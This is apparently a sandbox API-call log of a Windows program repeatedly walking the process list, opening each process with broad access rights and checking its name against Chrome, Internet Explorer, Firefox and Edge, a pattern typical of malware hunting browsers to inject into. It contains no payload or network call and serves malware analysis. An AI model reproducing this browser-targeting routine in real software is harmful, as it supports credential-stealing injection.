	[0206.445] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0206.446] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x2f7c
	[0206.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.446] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0206.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.447] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.447] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0206.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.447] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.447] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0206.448] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x2f80
	[0206.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.449] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0206.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.449] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.449] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0206.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.450] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.450] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.451] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x2f84
	[0206.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.451] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.451] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.451] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.452] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.452] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.453] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.453] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x2f88
	[0206.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.453] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.454] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.454] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.454] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.454] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0206.455] CloseHandle (hObject=0x188) returned 1
	[0206.455] Sleep (dwMilliseconds=0x64) 
	[0206.561] GetCurrentProcessId () returned 0x110
	[0206.561] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0206.567] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0206.570] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0206.571] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0206.573] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x2f8c
	[0206.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.573] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0206.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.574] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.574] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0206.574] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.574] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.574] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0206.575] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x2f90
	[0206.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.575] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0206.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.575] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.576] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0206.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.576] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.576] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0206.577] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x2f94
	[0206.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.577] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0206.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.577] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.578] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0206.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.578] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.578] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0206.579] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x2f98
	[0206.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.579] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0206.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.579] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.580] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0206.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.580] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.580] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0206.581] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x2f9c
	[0206.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.581] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0206.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.581] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.582] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0206.582] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.582] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.582] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0206.583] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x2fa0
	[0206.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.583] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0206.583] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.583] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.584] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0206.584] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.584] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.584] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0206.585] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x2fa4
	[0206.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.585] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0206.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.585] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.585] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.585] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0206.586] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.586] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.586] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0206.586] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x2fa8
	[0206.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.587] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0206.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.587] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.587] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0206.587] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.587] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.588] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.588] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x2fac
	[0206.588] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.588] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.589] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.589] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.589] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.589] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.589] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.590] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x2fb0
	[0206.590] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.590] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.591] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.591] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.592] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.592] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.592] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.592] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.593] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x2fb4
	[0206.593] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.593] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.594] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.594] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.594] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.594] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.594] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.595] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x2fb8
	[0206.595] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.595] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.596] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.596] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.596] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.596] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.596] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.597] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x2fbc
	[0206.597] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.597] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.597] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.597] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.598] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.598] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.598] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.599] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x2fc0
	[0206.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.599] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.599] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.600] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.600] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.600] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.601] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x2fc4
	[0206.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.601] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.601] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.602] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.602] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.602] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0206.603] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x2fc8
	[0206.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.603] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0206.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.603] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.603] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0206.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.604] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.604] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.605] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x2fcc
	[0206.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.605] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.605] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.606] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.606] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.606] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0206.607] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x2fd0
	[0206.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.607] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.607] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.607] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.608] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.608] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.608] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0206.609] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x2fd4
	[0206.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.609] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0206.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.609] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.610] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0206.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.610] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.610] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.611] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x2fd8
	[0206.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.611] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.611] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
